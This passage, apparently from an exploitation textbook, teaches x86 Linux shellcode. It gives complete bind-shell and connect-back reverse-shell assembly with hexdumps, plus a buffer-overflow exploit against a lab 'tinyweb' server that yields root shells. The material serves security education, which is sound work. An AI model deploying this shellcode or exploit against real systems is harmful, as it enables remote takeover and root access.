push edx ; push 32-bit null terminator to stack.

mov edx, esp ; This is an empty array for envp.

push ebx ; push string addr to stack above null terminator.

mov ecx, esp ; This is the argv array with string ptr.

int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

When this shellcode is assembled and used in an exploit, it will bind to port 31337 and wait for an incoming connection. In the output below, grep is used to quickly check for null bytes. At the end, the process hangs waiting for a connection.

reader@hacking:~/booksrc $ nasm bind_shell_beta.s

reader@hacking:~/booksrc $ hexdump -C bind_shell_beta | grep --color=auto 00

00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX.1.CRj.j.....|

00000010 89 c6 6a 66 58 43 52 66 68 7a 69 66 53 89 e1 6a |..jfXCRfhzifS..j|

00000020 10 51 56 89 e1 cd 80 b0 66 43 43 53 56 89 e1 cd |.QV.....fCCSV...|

00000030 80 b0 66 43 52 52 56 89 e1 cd 80 89 c3 6a 3f 58 |..fCRRV......j?X|

00000040 31 c9 cd 80 b0 3f 41 cd 80 b0 3f 41 cd 80 b0 0b |1....?A...?A....|

00000050 52 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 52 89 e2 |Rh//shh/bin..R..|

00000060 53 89 e1 cd 80 |S....|

00000065

reader@hacking:~/booksrc $ export SHELLCODE=$(cat bind_shell_beta)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./notesearch

SHELLCODE will be at 0xbffff97f

reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x7f\xf9\xff\xbf"x40')

[DEBUG] found a 33 byte note for user id 999

-------[ end of note data ]-------

From another terminal window, the program netstat is used to find the listening port. Then, netcat is used to connect to the root shell on that port.

reader@hacking:~/booksrc $ sudo netstat -lp | grep 31337

tcp 0 0 *:31337 *:* LISTEN 25604/notesearch

reader@hacking:~/booksrc $ nc -vv 127.0.0.1 31337

localhost [127.0.0.1] 31337 (?) open

whoami

root

Branching Control Structures

The control structures of the C programming language, such as for loops and if-then-else blocks, are made up of conditional branches and loops in the machine language. With control structures, the repeated calls to dup2 could be shrunk down to a single call in a loop. The first C program written in previous chapters used a for loop to greet the world 10 times. Disassembling the main function will show us how the compiler implemented the for loop using assembly instructions. The loop instructions (main+16 through main+48 below) come after the function prologue instructions save stack memory for the local variable i. This variable is referenced in relation to the EBP register as [ebp-4].

reader@hacking:~/booksrc $ gcc firstprog.c

reader@hacking:~/booksrc $ gdb -q ./a.out

Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) disass main

Dump of assembler code for function main:

0x08048374 <main+0>: push ebp

0x08048375 <main+1>: mov ebp,esp

0x08048377 <main+3>: sub esp,0x8

0x0804837a <main+6>: and esp,0xfffffff0

0x0804837d <main+9>: mov eax,0x0

0x08048382 <main+14>: sub esp,eax

0x08048384 <main+16>: mov DWORD PTR [ebp-4],0x0

0x0804838b <main+23>: cmp DWORD PTR [ebp-4],0x9

0x0804838f <main+27>: jle 0x8048393 <main+31>

0x08048391 <main+29>: jmp 0x80483a6 <main+50>

0x08048393 <main+31>: mov DWORD PTR [esp],0x8048484

0x0804839a <main+38>: call 0x80482a0 <printf@plt>

0x0804839f <main+43>: lea eax,[ebp-4]

0x080483a2 <main+46>: inc DWORD PTR [eax]

0x080483a4 <main+48>: jmp 0x804838b <main+23>

0x080483a6 <main+50>: leave

0x080483a7 <main+51>: ret

End of assembler dump.

(gdb)

The loop contains two new instructions: cmp (compare) and jle (jump if less than or equal to), the latter belonging to the family of conditional jump instructions. The cmp instruction will compare its two operands, setting flags based on the result. Then, a conditional jump instruction will jump based on the flags. In the code above, if the value at [ebp-4] is less than or equal to 9, execution will jump to 0x8048393, past the next jmp instruction. Otherwise, the next jmp instruction brings execution to the end of the function at 0x080483a6, exiting the loop. The body of the loop makes the call to printf(), increments the counter variable at [ebp-4], and finally jumps back to the compare instruction to continue the loop. Using conditional jump instructions, complex programming control structures such as loops can be created in assembly. More conditional jump instructions are shown below.

Instruction                     Description

cmp <dest>, <source>            Compare the destination operand with the source, setting flags for use with a conditional jump instruction.

je <target>                     Jump to target if the compared values are equal.

jne <target>                    Jump if not equal.

jl <target>                     Jump if less than.

jle <target>                    Jump if less than or equal to.

jnl <target>                    Jump if not less than.

jnle <target>                   Jump if not less than or equal to.

jg <target>, jge <target>       Jump if greater than, or greater than or equal to.

jng <target>, jnge <target>     Jump if not greater than, or not greater than or equal to.

These instructions can be used to shrink the dup2 portion of the shellcode down to the following:

; dup2(connected socket, {all three standard I/O file descriptors})

mov ebx, eax ; Move socket FD in ebx.

xor eax, eax ; Zero eax.

xor ecx, ecx ; ecx = 0 = standard input

dup_loop:

mov BYTE al, 0x3F ; dup2 syscall #63

int 0x80 ; dup2(c, ecx)

inc ecx

cmp BYTE cl, 2 ; Compare ecx with 2.

jle dup_loop ; If ecx <= 2, jump to dup_loop.

This loop iterates ECX from 0 to 2, making a call to dup2 each time. With a more complete understanding of the flags used by the cmp instruction, this loop can be shrunk even further. The status flags set by the cmp instruction are also set by most other instructions, describing the attributes of the instruction's result. These flags are carry flag (CF), parity flag (PF), adjust flag (AF), overflow flag (OF), zero flag (ZF), and sign flag (SF). The last two flags are the most useful and the easiest to understand. The zero flag is set to true if the result is zero, otherwise it is false. The sign flag is simply the most significant bit of the result, which is true if the result is negative and false otherwise. This means that, after any instruction with a negative result, the sign flag becomes true and the zero flag becomes false.

Abbreviation   Name        Description
ZF             zero flag   True if the result is zero.
SF             sign flag   True if the result is negative (equal to the most significant bit of the result).

The cmp (compare) instruction is actually just a sub (subtract) instruction that throws away the result, only affecting the status flags. The jle (jump if less than or equal to) instruction is actually checking the zero and sign flags. If either of these flags is true, then the destination (first) operand is less than or equal to the source (second) operand. (Strictly speaking, jle compares the sign flag against the overflow flag, so this simplified description holds whenever the subtraction does not overflow, as with the small values used here.) The other conditional jump instructions work in a similar way, and there are still more conditional jump instructions that directly check individual status flags:

Instruction      Description
jz <target>      Jump to target if the zero flag is set.
jnz <target>     Jump if the zero flag is not set.
js <target>      Jump if the sign flag is set.
jns <target>     Jump if the sign flag is not set.
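As a rough illustration of how the zero and sign flags fall out of a subtraction, the Python sketch below models cmp as a 32-bit subtract that keeps only the flags. The function name flags_after_sub is hypothetical, and the model covers only ZF and SF; the other status flags are ignored.

```python
MASK32 = 0xFFFFFFFF  # registers are 32 bits wide


def flags_after_sub(dest, source):
    """Return (ZF, SF) for the 32-bit result of dest - source, as cmp would set them."""
    result = (dest - source) & MASK32   # cmp computes dest - source and discards it
    zero_flag = result == 0             # ZF: the result is zero
    sign_flag = bool(result >> 31)      # SF: most significant bit of the result
    return zero_flag, sign_flag


for value in (1, 2, 3):
    zf, sf = flags_after_sub(value, 2)
    print(f"cmp {value}, 2 -> ZF={int(zf)} SF={int(sf)}")
```

For the values 1 and 2, at least one of the two flags is set, which is the case where jle takes the jump; for 3, both flags are clear and execution falls through.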

With this knowledge, the cmp (compare) instruction can be removed entirely if the loop's order is reversed. Starting from 2 and counting down, the sign flag can be checked to loop until 0. The shortened loop is shown below, with the changes shown in bold.

; dup2(connected socket, {all three standard I/O file descriptors})

mov ebx, eax ; Move socket FD in ebx.

xor eax, eax ; Zero eax.

push BYTE 0x2 ; ecx starts at 2.

pop ecx

dup_loop:

mov BYTE al, 0x3F ; dup2 syscall #63

int 0x80 ; dup2(c, 0)

dec ecx ; Count down to 0.

jns dup_loop ; If the sign flag is not set, ecx is not negative.
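The countdown can be traced with a small Python model of the dec and jns instructions. This is only a sketch: dup2_countdown is a hypothetical name, the descriptor value 4 is made up for the example, and the system call itself is replaced by recording its arguments.

```python
MASK32 = 0xFFFFFFFF  # registers are 32 bits wide


def dup2_countdown(socket_fd, start=2):
    """Model the dec/jns loop and return the (oldfd, newfd) pairs handed to dup2."""
    calls = []
    ecx = start                          # push BYTE 0x2 / pop ecx
    while True:
        calls.append((socket_fd, ecx))   # int 0x80 with al = 0x3F: dup2(ebx, ecx)
        ecx = (ecx - 1) & MASK32         # dec ecx
        sign_flag = bool(ecx >> 31)      # SF is the top bit of the new ecx
        if sign_flag:                    # jns only jumps while SF is clear
            break
    return calls


print(dup2_countdown(4))  # [(4, 2), (4, 1), (4, 0)]
```

The loop exits when ECX wraps from 0 to 0xffffffff, since that is the first result with its most significant bit set.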

The first two instructions before the loop can be shortened with the xchg (exchange) instruction. This instruction swaps the values between the source and destination operands:

Instruction               Description
xchg <dest>, <source>     Exchange the values between the two operands.

This single instruction can replace both of the following instructions, which take up four bytes:

89 C3 mov ebx,eax

31 C0 xor eax,eax

EAX only needs to be zeroed so that its upper three bytes are clear before the syscall number is loaded into AL, and EBX already has these upper bytes cleared. So swapping the values between EAX and EBX will kill two birds with one stone, reducing the size to the following single-byte instruction:

93 xchg eax,ebx
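The reasoning can be checked with a small register model in Python. This is a sketch under stated assumptions: xchg_then_load_al is a hypothetical helper, and the descriptor value 7 is invented for the example; the value 5 in EBX is the socketcall type left over from the accept() call.

```python
def xchg_then_load_al(eax, ebx, syscall_number=0x3F):
    """Model `xchg eax, ebx` followed by `mov al, 0x3F` on 32-bit register values."""
    eax, ebx = ebx, eax                         # xchg eax, ebx
    eax = (eax & 0xFFFFFF00) | syscall_number   # mov al, 0x3F changes only the low byte
    return eax, ebx


# After accept(): eax = connected socket FD (7 is a made-up value), ebx = 5.
eax, ebx = xchg_then_load_al(eax=7, ebx=5)
print(hex(eax), ebx)  # 0x3f 7
```

If EBX had held a value with any of its upper three bytes set, those bytes would survive the mov into AL and EAX would no longer equal 63, which is why the trick depends on EBX being a small number at this point.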

Since the xchg instruction is actually smaller than a mov instruction between two registers, it can be used to shrink shellcode in other places. Naturally, this only works in situations where the source operand's register doesn't matter. The following version of the bind port shellcode uses the exchange instruction to shave a few more bytes off its size.

bind_shell.s

BITS 32

; s = socket(2, 1, 0)

push BYTE 0x66 ; socketcall is syscall #102 (0x66).

pop eax

cdq ; Zero out edx for use as a null DWORD later.

xor ebx, ebx ; ebx is the type of socketcall.

inc ebx ; 1 = SYS_SOCKET = socket()

push edx ; Build arg array: { protocol = 0,

push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,

push BYTE 0x2 ; AF_INET = 2 }

mov ecx, esp ; ecx = ptr to argument array

int 0x80 ; After syscall, eax has socket file descriptor.

xchg esi, eax ; Save socket FD in esi for later.

; bind(s, [2, 31337, 0], 16)

push BYTE 0x66 ; socketcall (syscall #102)

pop eax

inc ebx ; ebx = 2 = SYS_BIND = bind()

push edx ; Build sockaddr struct: INADDR_ANY = 0

push WORD 0x697a ; (in reverse order) PORT = 31337

push WORD bx ; AF_INET = 2

mov ecx, esp ; ecx = server struct pointer

push BYTE 16 ; argv: { sizeof(server struct) = 16,

push ecx ; server struct pointer,

push esi ; socket file descriptor }

mov ecx, esp ; ecx = argument array

int 0x80 ; eax = 0 on success

; listen(s, 0)

mov BYTE al, 0x66 ; socketcall (syscall #102)

inc ebx

inc ebx ; ebx = 4 = SYS_LISTEN = listen()

push ebx ; argv: { backlog = 4,

push esi ; socket fd }

mov ecx, esp ; ecx = argument array

int 0x80

; c = accept(s, 0, 0)

mov BYTE al, 0x66 ; socketcall (syscall #102)

inc ebx ; ebx = 5 = SYS_ACCEPT = accept()

push edx ; argv: { socklen = 0,

push edx ; sockaddr ptr = NULL,

push esi ; socket fd }

mov ecx, esp ; ecx = argument array

int 0x80 ; eax = connected socket FD

; dup2(connected socket, {all three standard I/O file descriptors})

xchg eax, ebx ; Put socket FD in ebx and 0x00000005 in eax.

push BYTE 0x2 ; ecx starts at 2.

pop ecx

dup_loop:

mov BYTE al, 0x3F ; dup2 syscall #63

int 0x80 ; dup2(c, 0)

dec ecx ; count down to 0

jns dup_loop ; If the sign flag is not set, ecx is not negative.

; execve(const char *filename, char *const argv [], char *const envp[])

mov BYTE al, 11 ; execve syscall #11

push edx ; push some nulls for string termination.

push 0x68732f2f ; push "//sh" to the stack.

push 0x6e69622f ; push "/bin" to the stack.

mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp.

push edx ; push 32-bit null terminator to stack.

mov edx, esp ; This is an empty array for envp.

push ebx ; push string addr to stack above null terminator.

mov ecx, esp ; This is the argv array with string ptr

int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

This assembles to the same 92-byte bind_shell shellcode used in the previous chapter.

reader@hacking:~/booksrc $ nasm bind_shell.s

reader@hacking:~/booksrc $ hexdump -C bind_shell

00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX.1.CRj.j.....|

00000010 96 6a 66 58 43 52 66 68 7a 69 66 53 89 e1 6a 10 |.jfXCRfhzifS..j.|

00000020 51 56 89 e1 cd 80 b0 66 43 43 53 56 89 e1 cd 80 |QV.....fCCSV....|

00000030 b0 66 43 52 52 56 89 e1 cd 80 93 6a 02 59 b0 3f |.fCRRV.....j.Y.?|

00000040 cd 80 49 79 f9 b0 0b 52 68 2f 2f 73 68 68 2f 62 |..Iy...Rh//shh/b|

00000050 69 6e 89 e3 52 89 e2 53 89 e1 cd 80 |in..R..S....|

0000005c

reader@hacking:~/booksrc $ diff bind_shell portbinding_shellcode
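As an additional sanity check, the bytes can be examined in Python. The sketch below transcribes the rows from the hexdump above by hand (it does not read the assembled file), then confirms the length, looks for null bytes, and recovers the port from the operand of the push WORD instruction (opcode bytes 66 68).

```python
# Rows transcribed from the hexdump output above.
HEXDUMP_ROWS = [
    "6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80",
    "96 6a 66 58 43 52 66 68 7a 69 66 53 89 e1 6a 10",
    "51 56 89 e1 cd 80 b0 66 43 43 53 56 89 e1 cd 80",
    "b0 66 43 52 52 56 89 e1 cd 80 93 6a 02 59 b0 3f",
    "cd 80 49 79 f9 b0 0b 52 68 2f 2f 73 68 68 2f 62",
    "69 6e 89 e3 52 89 e2 53 89 e1 cd 80",
]

shellcode = bytes.fromhex(" ".join(HEXDUMP_ROWS))

# The first 66 68 sequence is the push WORD; its two operand bytes follow.
port_offset = shellcode.index(b"\x66\x68") + 2
port = int.from_bytes(shellcode[port_offset:port_offset + 2], "big")

print(len(shellcode))          # 92
print(b"\x00" in shellcode)    # False
print(port)                    # 31337
```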

Connect-Back Shellcode

Port-binding shellcode is easily foiled by firewalls. Most firewalls will block incoming connections, except for certain ports with known services. This limits the user's exposure and will prevent port-binding shellcode from receiving a connection. Software firewalls are now so common that port-binding shellcode has little chance of actually working in the wild.

However, firewalls typically do not filter outbound connections, since that would hinder usability. From inside the firewall, a user should be able to access any web page or make any other outbound connections. This means that if the shellcode initiates the outbound connection, most firewalls will allow it.

Instead of waiting for a connection from an attacker, connect-back shellcode initiates a TCP connection back to the attacker's IP address. Opening a TCP connection only requires a call to socket() and a call to connect(). This is very similar to the bind-port shellcode, since the socket call is exactly the same and the connect() call takes the same type of arguments as bind(). The following connect-back shellcode was made from the bind-port shellcode with a few modifications (shown in bold).

connectback_shell.s

BITS 32

; s = socket(2, 1, 0)

push BYTE 0x66 ; socketcall is syscall #102 (0x66).

pop eax

cdq ; Zero out edx for use as a null DWORD later.

xor ebx, ebx ; ebx is the type of socketcall.

inc ebx ; 1 = SYS_SOCKET = socket()

push edx ; Build arg array: { protocol = 0,

push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,

push BYTE 0x2 ; AF_INET = 2 }

mov ecx, esp ; ecx = ptr to argument array

int 0x80 ; After syscall, eax has socket file descriptor.

xchg esi, eax ; Save socket FD in esi for later.

; connect(s, [2, 31337, <IP address>], 16)

push BYTE 0x66 ; socketcall (syscall #102)

pop eax

inc ebx ; ebx = 2 (needed for AF_INET)

push DWORD 0x482aa8c0 ; Build sockaddr struct: IP address = 192.168.42.72

push WORD 0x697a ; (in reverse order) PORT = 31337

push WORD bx ; AF_INET = 2

mov ecx, esp ; ecx = server struct pointer

push BYTE 16 ; argv: { sizeof(server struct) = 16,

push ecx ; server struct pointer,

push esi ; socket file descriptor }

mov ecx, esp ; ecx = argument array

inc ebx ; ebx = 3 = SYS_CONNECT = connect()

int 0x80 ; eax = 0 on success (the socket FD is still in esi)

; dup2(connected socket, {all three standard I/O file descriptors})

xchg esi, ebx ; Put socket FD in ebx and 0x00000003 in esi.

xchg ecx, esi ; ecx = 3

dec ecx ; ecx starts at 2.

dup_loop:

mov BYTE al, 0x3F ; dup2 syscall #63

int 0x80 ; dup2(c, 0)

dec ecx ; Count down to 0.

jns dup_loop ; If the sign flag is not set, ecx is not negative.

; execve(const char *filename, char *const argv [], char *const envp[])

mov BYTE al, 11 ; execve syscall #11.

push edx ; push some nulls for string termination.

push 0x68732f2f ; push "//sh" to the stack.

push 0x6e69622f ; push "/bin" to the stack.

mov ebx, esp ; Put the address of "/bin//sh" into ebx via esp.

push edx ; push 32-bit null terminator to stack.

mov edx, esp ; This is an empty array for envp.

push ebx ; push string addr to stack above null terminator.

mov ecx, esp ; This is the argv array with string ptr.

int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

In the shellcode above, the connection IP address is set to 192.168.42.72, which should be the IP address of the attacking machine. This address is stored in the in_addr structure as 0x482aa8c0, which is the hexadecimal representation of 72, 42, 168, and 192. This is made clear when each number is displayed in hexadecimal:

reader@hacking:~/booksrc $ gdb -q

(gdb) p /x 192

$1 = 0xc0

(gdb) p /x 168

$2 = 0xa8

(gdb) p /x 42

$3 = 0x2a

(gdb) p /x 72

$4 = 0x48

(gdb) p /x 31337

$5 = 0x7a69

(gdb)

Since these values must be stored in network byte order but the x86 architecture is little-endian, the DWORD operand appears reversed. A little-endian push of 0x482aa8c0 lays out the bytes c0 a8 2a 48 in memory, which is 192.168.42.72 in network byte order. The same applies to the two-byte WORD used for the destination port. When the port number 31337 is printed in hexadecimal using gdb, the value is shown as 0x7a69, with the most significant byte first. These two bytes must be swapped in the push operand, so the WORD for 31337 is 0x697a.
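The same conversion can be done programmatically. The following Python sketch uses the standard socket and struct modules to derive the push operands for any address and port; push_operands is a hypothetical helper name, not something from the book's source code.

```python
import socket
import struct


def push_operands(ip, port):
    """Return the DWORD and WORD operands whose little-endian bytes are in network order."""
    ip_bytes = socket.inet_aton(ip)                  # four bytes, network byte order
    ip_dword = struct.unpack("<I", ip_bytes)[0]      # read them back as a little-endian DWORD
    port_bytes = struct.pack("!H", port)             # two bytes, network byte order
    port_word = struct.unpack("<H", port_bytes)[0]   # read them back as a little-endian WORD
    return ip_dword, port_word


ip_dword, port_word = push_operands("192.168.42.72", 31337)
print(hex(ip_dword), hex(port_word))  # 0x482aa8c0 0x697a
```

Changing the arguments gives the operands for a different attacking machine or port, although any resulting null bytes would still need to be dealt with separately.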

The netcat program can also be used to listen for incoming connections with the -l command-line option. This is used in the output below to listen on port 31337 for the connect-back shellcode. The ifconfig command ensures the IP address of eth0 is 192.168.42.72 so the shellcode can connect back to it.

reader@hacking:~/booksrc $ sudo ifconfig eth0 192.168.42.72 up

reader@hacking:~/booksrc $ ifconfig eth0

eth0 Link encap:Ethernet HWaddr 00:01:6C:EB:1D:50

inet addr:192.168.42.72 Bcast:192.168.42.255 Mask:255.255.255.0

UP BROADCAST MULTICAST MTU:1500 Metric:1

RX packets:0 errors:0 dropped:0 overruns:0 frame:0

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

Interrupt:16

reader@hacking:~/booksrc $ nc -v -l -p 31337

listening on [any] 31337 ...

Now, let's try to exploit the tinyweb server program using the connect-back shellcode. From working with this program before, we know that the request buffer is 500 bytes long and is located at 0xbffff5c0 in stack memory. We also know that the return address is found within 40 bytes of the end of the buffer.

reader@hacking:~/booksrc $ nasm connectback_shell.s

reader@hacking:~/booksrc $ hexdump -C connectback_shell

00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX.1.CRj.j.....|

00000010 96 6a 66 58 43 68 c0 a8 2a 48 66 68 7a 69 66 53 |.jfXCh..*HfhzifS|

00000020 89 e1 6a 10 51 56 89 e1 43 cd 80 87 f3 87 ce 49 |..j.QV..C......I|

00000030 b0 3f cd 80 49 79 f9 b0 0b 52 68 2f 2f 73 68 68 |.?..Iy...Rh//shh|

00000040 2f 62 69 6e 89 e3 52 89 e2 53 89 e1 cd 80 |/bin..R..S....|

0000004e

reader@hacking:~/booksrc $ wc -c connectback_shell

78 connectback_shell

reader@hacking:~/booksrc $ echo $(( 544 - (4*16) - 78 ))

402

reader@hacking:~/booksrc $ gdb -q --batch -ex "p /x 0xbffff5c0 + 200"

$1 = 0xbffff688

reader@hacking:~/booksrc $

Since the offset from the beginning of the buffer to the return address is 540 bytes, a total of 544 bytes must be written to overwrite the four-byte return address. The overwrite also needs to be properly aligned, since the return address spans multiple bytes. To ensure proper alignment, the sum of the NOP sled and shellcode bytes must be divisible by four. In addition, the shellcode itself must stay within the first 500 bytes of the overwrite. These are the bounds of the request buffer, and the memory afterward corresponds to other values on the stack that might be written to before we change the program's control flow. Staying within these bounds avoids the risk of random overwrites to the shellcode, which inevitably lead to crashes.

Repeating the return address 16 times will generate 64 bytes, which can be put at the end of the 544-byte exploit buffer and keeps the shellcode safely within the bounds of the buffer. The remaining bytes at the beginning of the exploit buffer will be the NOP sled. The calculations above show that a 402-byte NOP sled will properly align the 78-byte shellcode and place it safely within the bounds of the buffer. With the return address repeated 16 times, the final 4 bytes of the exploit buffer land exactly on the saved return address on the stack. Overwriting the return address with 0xbffff688 should return execution right to the middle of the NOP sled, while avoiding bytes near the beginning of the buffer, which might get mangled. These calculated values will be used in the following exploit, but first the connect-back shell needs some place to connect back to. In the output below, netcat is used to listen for incoming connections on port 31337.

reader@hacking:~/booksrc $ nc -v -l -p 31337

listening on [any] 31337 ...
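The buffer arithmetic described above can also be written as a short Python sketch, which makes the alignment and bounds constraints explicit. The function name exploit_layout and its parameter names are hypothetical; the numbers are the ones used in the text.

```python
import struct


def exploit_layout(shellcode_len, total_len=544, ret_repeats=16, buffer_len=500):
    """Return the NOP sled length for a sled + shellcode + repeated-address buffer."""
    ret_bytes = 4 * ret_repeats
    sled_len = total_len - ret_bytes - shellcode_len
    # The repeated addresses are aligned only if everything before them is a multiple of 4.
    assert (sled_len + shellcode_len) % 4 == 0, "return addresses would be misaligned"
    # The shellcode must end inside the 500-byte request buffer.
    assert sled_len + shellcode_len <= buffer_len, "shellcode spills past the buffer"
    return sled_len


sled_len = exploit_layout(78)
return_address = 0xbffff5c0 + 200   # lands roughly in the middle of the NOP sled

print(sled_len)                                  # 402
print(hex(return_address))                       # 0xbffff688
print(struct.pack("<I", return_address).hex())   # 88f6ffbf
```

The last line shows the little-endian byte sequence that has to be repeated at the end of the exploit buffer.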

Now, in another terminal, the calculated exploit values can be used to exploit the tinyweb program remotely.

From Another Terminal Window

reader@hacking:~/booksrc $ (perl -e 'print "\x90"x402';

> cat connectback_shell;

> perl -e 'print "\x88\xf6\xff\xbf"x16 . "\r\n"') | nc -v 127.0.0.1 80

localhost [127.0.0.1] 80 (www) open

Back in the original terminal, the shellcode has connected back to the netcat process listening on port 31337. This provides root shell access remotely.

reader@hacking:~/booksrc $ nc -v -l -p 31337

listening on [any] 31337 ...

connect to [192.168.42.72] from hacking.local [192.168.42.72] 34391

whoami

root

The network configuration for this example is slightly confusing because the attack is directed at 127.0.0.1 and the shellcode connects back to 192.168.42.72. Both of these IP addresses route to the same place, but 192.168.42.72 is easier to use in shellcode than 127.0.0.1. Since the loopback address contains two null bytes, the address must be built on the stack with multiple instructions. One way to do this is to write the two null bytes to the stack using a zeroed register. The file loopback_shell.s is a modified version of connectback_shell.s that uses the loopback address of 127.0.0.1. The differences are shown in the following output.

reader@hacking:~/booksrc $ diff connectback_shell.s loopback_shell.s

21c21,22

< push DWORD 0x482aa8c0 ; Build sockaddr struct: IP Address = 192.168.42.72

---

> push DWORD 0x01BBBB7f ; Build sockaddr struct: IP Address = 127.0.0.1

> mov WORD [esp+1], dx ; overwrite the BBBB with 0000 in the previous push

reader@hacking:~/booksrc $

After pushing the value 0x01BBBB7f to the stack, the ESP register will point to the beginning of this DWORD. By writing a two-byte WORD of null bytes at ESP+1, the middle two bytes will be overwritten to form the correct IP address, 127.0.0.1.
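The effect of these two instructions on memory can be modeled in Python with a four-byte bytearray standing in for the top of the stack. This is only an illustration; patched_loopback is a hypothetical name, and index 0 of the bytearray plays the role of the address in ESP.

```python
import socket
import struct


def patched_loopback():
    """Model `push DWORD 0x01BBBB7f` followed by `mov WORD [esp+1], dx` with dx = 0."""
    stack = bytearray(struct.pack("<I", 0x01BBBB7F))   # bytes at ESP: 7f bb bb 01
    assert b"\x00" not in stack                        # the pushed operand is null-free
    stack[1:3] = struct.pack("<H", 0)                  # write a zero WORD at ESP+1
    return bytes(stack)


address = patched_loopback()
print(address.hex())               # 7f000001
print(socket.inet_ntoa(address))   # 127.0.0.1
```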

This additional instruction increases the size of the shellcode by five bytes (from 78 to 83), which means the NOP sled also needs to be adjusted for the exploit buffer. These calculations are shown in the output below, and they result in a 397-byte NOP sled. This exploit using the loopback shellcode assumes that the tinyweb program is running and that a netcat process is listening for incoming connections on port 31337.

reader@hacking:~/booksrc $ nasm loopback_shell.s

reader@hacking:~/booksrc $ hexdump -C loopback_shell | grep --color=auto 00

00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX.1.CRj.j.....|

00000010 96 6a 66 58 43 68 7f bb bb 01 66 89 54 24 01 66 |.jfXCh....f.T$.f|

00000020 68 7a 69 66 53 89 e1 6a 10 51 56 89 e1 43 cd 80 |hzifS..j.QV..C..|

00000030 87 f3 87 ce 49 b0 3f cd 80 49 79 f9 b0 0b 52 68 |....I.?..Iy...Rh|

00000040 2f 2f 73 68 68 2f 62 69 6e 89 e3 52 89 e2 53 89 |//shh/bin..R..S.|

00000050 e1 cd 80 |...|

00000053

reader@hacking:~/booksrc $ wc -c loopback_shell

83 loopback_shell

reader@hacking:~/booksrc $ echo $(( 544 - (4*16) - 83 ))

397

reader@hacking:~/booksrc $ (perl -e 'print "\x90"x397';cat loopback_shell;perl -e 'print "\x88\xf6\xff\xbf"x16 . "\r\n"') | nc -v 127.0.0.1 80

localhost [127.0.0.1] 80 (www) open

As with the previous exploit, the terminal with netcat listening on port 31337 will receive the root shell.

reader@hacking:~ $ nc -vlp 31337

listening on [any] 31337 ...

connect to [127.0.0.1] from localhost [127.0.0.1] 42406

whoami

root

It almost seems too easy, doesn't it?